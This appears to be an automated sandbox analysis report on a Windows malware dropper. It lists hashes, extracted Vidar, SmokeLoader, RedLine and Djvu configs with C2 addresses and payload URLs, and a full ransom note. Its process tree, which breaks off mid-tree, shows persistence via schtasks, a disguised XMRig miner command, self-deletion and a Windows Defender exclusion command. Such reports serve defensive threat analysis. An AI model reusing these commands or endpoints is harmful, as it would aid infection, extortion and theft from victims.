Analysis
-
max time kernel
81s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
13-03-2022 09:00
General
-
Target
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe
-
Size
3.7MB
-
MD5
4bd56f1559ed71cbe361a5eb98872ec7
-
SHA1
22eb1eac44baaac3bab313d35f7732aafb4e80a3
-
SHA256
f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d
-
SHA512
4928dd3e2b789ef14fea37c9fdae070a3516cf496d8b2cff8b90720c6de5315ad7df1a54564fa4986adeb1534300eaaa7ab998774a33c7e4fb8c2483c0c35e4c
Malware Config
Extracted
vidar
39.6
933
https://sslamlssa1.tumblr.com/
-
profile_id
933
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
Build2
45.142.213.135:30059
Extracted
redline
ruzkida
185.11.73.55:22201
-
auth_value
000938fe0d697ca6a3b6cee46ba02ff3
Extracted
redline
ruzki12_03
176.122.23.55:11768
-
auth_value
c51ddc8008e8581a01cec6e8291c5530
Extracted
djvu
http://fuyt.org/test3/get.php
-
extension
.xcbg
-
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
-
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn
Signatures
-
Detected Djvu ransomware 3 IoCs
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE Danabot Key Exchange Request
suricata: ET MALWARE Danabot Key Exchange Request
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
XMRig Miner Payload 3 IoCs
-
ASPack v2.12-2.42 8 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 2 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 52 IoCs
-
Modifies Windows Firewall 1 TTPs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 17 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 39 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 8 IoCs
-
Drops file in Program Files directory 23 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 57 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies registry class 21 IoCs
-
Modifies system certificate store 2 TTPs 4 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 18 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe"C:\Users\Admin\AppData\Local\Temp\f6a7ddb46eadef18fb2b46ab561fec15d1bed25c6518491d5219329d11fc413d.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_8.exesahiba_8.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\system64.exe"C:\Users\Admin\AppData\Roaming\system64.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\system64.exe"C:\Users\Admin\AppData\Roaming\system64.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'11⤵
- Creates scheduled task(s)
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=8010⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 464 -s 28811⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 464 -s 29211⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=808⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1344 -s 3009⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1344 -s 3049⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Install2.EXE"C:\Users\Admin\AppData\Local\Temp\Install2.EXE"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSBBDB.tmp\Install.cmd" "8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Df2r79⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8156846f8,0x7ff815684708,0x7ff81568471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings10⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6b0235460,0x7ff6b0235470,0x7ff6b023548011⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14635549224069530163,8119908570377383195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:810⤵
-
C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_6.exesahiba_6.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\q7qe_a0ikJj9r1Tt_dSq8ad5.exe"C:\Users\Admin\Documents\q7qe_a0ikJj9r1Tt_dSq8ad5.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe"C:\Users\Admin\AppData\Local\Temp\bdd506f1-f2b8-464c-be8a-328fdc7c3369.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe"C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 6247⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 7807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 12927⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 13007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 13447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 13247⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "RTLIv59rgr2ywOZxYERl3i7d.exe" /f & erase "C:\Users\Admin\Documents\RTLIv59rgr2ywOZxYERl3i7d.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "RTLIv59rgr2ywOZxYERl3i7d.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 13767⤵
- Program crash
-
C:\Users\Admin\Documents\GGZuKAvlVgsiOJtG4ZvHBMf8.exe"C:\Users\Admin\Documents\GGZuKAvlVgsiOJtG4ZvHBMf8.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe"C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exeC:\Users\Admin\Documents\5yfazEzcdUiOwhyVDRk6VI26.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\OdWkSXo7oi5oqr8oooXgrl2n.exe"C:\Users\Admin\Documents\OdWkSXo7oi5oqr8oooXgrl2n.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 4247⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 4407⤵
- Program crash
-
C:\Users\Admin\Documents\70pVl2zvsfL6bROCn__7iQJN.exe"C:\Users\Admin\Documents\70pVl2zvsfL6bROCn__7iQJN.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\Documents\ItMkYX_n_SCidLEm796l_vOZ.exe"C:\Users\Admin\Documents\ItMkYX_n_SCidLEm796l_vOZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\puFib_mN6HqGzK5uF14kFFxZ.exe"C:\Users\Admin\Documents\puFib_mN6HqGzK5uF14kFFxZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#617⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 6007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 9687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 8687⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 9687⤵
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#617⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 5368⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
- Program crash
-
C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe"C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RD6tmZH473Mxiy1QiSni4Ipw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RD6tmZH473Mxiy1QiSni4Ipw.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\9mwVCm19d9gWrQGu9nBZuWD8.exe"C:\Users\Admin\Documents\9mwVCm19d9gWrQGu9nBZuWD8.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Documents\n8_CxLe71_GIr_omHI3emyQO.exe"C:\Users\Admin\Documents\n8_CxLe71_GIr_omHI3emyQO.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\dada.exe"C:\Users\Admin\AppData\Local\Temp\dada.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\DnSUr5m02PxtLbSxliYLhS_O.exe"C:\Users\Admin\Documents\DnSUr5m02PxtLbSxliYLhS_O.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Users\Admin\Documents\ccvPZKnxQVnp6SMk85B2ULTz.exe"C:\Users\Admin\Documents\ccvPZKnxQVnp6SMk85B2ULTz.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\vl8txTVy4WKIfcG7GdJi3UHD.exe"C:\Users\Admin\Documents\vl8txTVy4WKIfcG7GdJi3UHD.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS5D5.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS1E9C.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
